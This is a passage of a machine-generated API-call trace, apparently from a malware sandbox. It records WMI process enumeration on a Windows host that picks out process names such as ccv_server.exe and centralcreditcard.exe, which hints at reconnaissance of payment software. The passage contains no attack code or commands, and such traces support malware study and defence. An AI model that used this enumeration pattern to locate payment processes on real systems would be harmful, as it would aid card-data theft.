[4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec3108) returned 0x0 [0225.628] WbemDefPath:IUnknown:AddRef (This=0x5ec3108) returned 0x3 [0225.628] WbemDefPath:IUnknown:Release (This=0x5ec3108) returned 0x2 [0225.628] WbemDefPath:IWbemPath:SetText (This=0x5ec3108, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2780\"") returned 0x0 [0225.628] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.628] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.628] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.629] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.629] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.629] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.629] IWbemClassObject:Get (in: This=0x5ecd5d0, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fc9b4*=0, plFlavor=0x26fc9b8*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x26fc9b4*=8, plFlavor=0x26fc9b8*=0) returned 0x0 [0225.629] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0225.629] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0225.629] IWbemClassObject:Get (in: This=0x5ecd5d0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fc9b4*=8, plFlavor=0x26fc9b8*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ccv_server.exe", varVal2=0x0), pType=0x26fc9b4*=8, plFlavor=0x26fc9b8*=0) returned 0x0 [0225.629] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0225.629] SysStringByteLen (bstr="ccv_server.exe") returned 0x1c [0225.629] CoTaskMemAlloc (cb=0x4) returned 0x5eca848 [0225.629] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca848, puReturned=0x26dde18 | out: apObjects=0x5eca848*=0x5ecd768, puReturned=0x26dde18*=0x1) returned 0x0 [0225.630] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd768) returned 0x0 [0225.631] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.631] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.631] IUnknown:AddRef (This=0x5ecd768) returned 0x3 [0225.631] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.631] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.631] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd76c) returned 0x0 [0225.631] IMarshal:GetUnmarshalClass (in: This=0x5ecd76c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.632] IUnknown:Release (This=0x5ecd76c) returned 0x3 [0225.632] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.632] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.632] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.632] IUnknown:Release (This=0x5ecd768) returned 0x2 [0225.632] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.632] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.632] IUnknown:QueryInterface (in: This=0x5ecd768, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd768) returned 0x0 [0225.632] IUnknown:AddRef (This=0x5ecd768) returned 0x4 [0225.632] IUnknown:Release (This=0x5ecd768) returned 0x3 [0225.632] IUnknown:Release (This=0x5ecd768) returned 0x2 [0225.632] CoTaskMemFree (pv=0x5eca848) [0225.632] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.632] IUnknown:AddRef (This=0x5ecd768) returned 0x3 [0225.632] IWbemClassObject:Get (in: This=0x5ecd768, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.633] IWbemClassObject:Get (in: This=0x5ecd768, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.633] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x66 [0225.633] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x66 [0225.633] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.633] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.633] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.633] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.634] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca848) returned 0x0 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca848, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.635] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca848, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec31e8) returned 0x0 [0225.635] WbemDefPath:IUnknown:Release (This=0x5eca848) returned 0x0 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec31e8) returned 0x0 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.635] WbemDefPath:IUnknown:AddRef (This=0x5ec31e8) returned 0x3 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.635] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca858) returned 0x0 [0225.635] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca858, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0225.635] WbemDefPath:IUnknown:Release (This=0x5eca858) returned 0x3 [0225.635] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0225.636] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0225.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0225.636] WbemDefPath:IUnknown:Release (This=0x5ec31e8) returned 0x2 [0225.636] WbemDefPath:IUnknown:Release (This=0x5ec31e8) returned 0x1 [0225.636] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0225.636] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0225.636] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec31e8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5ec31e8) returned 0x0 [0225.636] WbemDefPath:IUnknown:AddRef (This=0x5ec31e8) returned 0x3 [0225.636] WbemDefPath:IUnknown:Release (This=0x5ec31e8) returned 0x2 [0225.636] WbemDefPath:IWbemPath:SetText (This=0x5ec31e8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2788\"") returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0225.636] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0225.636] IWbemClassObject:Get (in: This=0x5ecd768, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fd230*=0, plFlavor=0x26fd234*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x26fd230*=8, plFlavor=0x26fd234*=0) returned 0x0 [0225.637] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0225.637] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0225.637] IWbemClassObject:Get (in: This=0x5ecd768, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26fd230*=8, plFlavor=0x26fd234*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="centralcreditcard.exe", varVal2=0x0), pType=0x26fd230*=8, plFlavor=0x26fd234*=0) returned 0x0 [0225.637] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0225.637] SysStringByteLen (bstr="centralcreditcard.exe") returned 0x2a [0225.637] CoTaskMemAlloc (cb=0x4) returned 0x5eca888 [0225.637] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5eca888, puReturned=0x26dde18 | out: apObjects=0x5eca888*=0x5ecd900, puReturned=0x26dde18*=0x1) returned 0x0 [0225.638] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5ecd900) returned 0x0 [0225.638] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0225.638] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0225.639] IUnknown:AddRef (This=0x5ecd900) returned 0x3 [0225.639] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0225.639] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0225.639] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5ecd904) returned 0x0 [0225.639] IMarshal:GetUnmarshalClass (in: This=0x5ecd904, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0225.639] IUnknown:Release (This=0x5ecd904) returned 0x3 [0225.639] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0225.639] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0225.639] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0225.639] IUnknown:Release (This=0x5ecd900) returned 0x2 [0225.639] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0225.639] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0225.639] IUnknown:QueryInterface (in: This=0x5ecd900, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5ecd900) returned 0x0 [0225.639] IUnknown:AddRef (This=0x5ecd900) returned 0x4 [0225.640] IUnknown:Release (This=0x5ecd900) returned 0x3 [0225.640] IUnknown:Release (This=0x5ecd900) returned 0x2 [0225.640] CoTaskMemFree (pv=0x5eca888) [0225.640] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0225.640] IUnknown:AddRef (This=0x5ecd900) returned 0x3 [0225.640] IWbemClassObject:Get (in: This=0x5ecd900, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0225.641] IWbemClassObject:Get (in: This=0x5ecd900, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2796\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0225.641] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2796\"") returned 0x66 [0225.641] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2796\"") returned 0x66 [0225.641] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0225.641] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0225.641] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0225.641] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0225.642] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5eca888) returned 0x0 [0225.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eca888, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0225.642] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5eca888, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5ec32c8) returned 0x0 [0225.642] WbemDefPath:IUnknown:Release (This=0x5eca888) returned 0x0 [0225.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5ec32c8) returned 0x0 [0225.642] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0225.643] WbemDefPath:IUnknown:AddRef (This=0x5ec32c8) returned 0x3 [0225.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0225.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0225.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x5ec32c8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5eca898) returned 0x0 [0225.643] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5eca898, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, 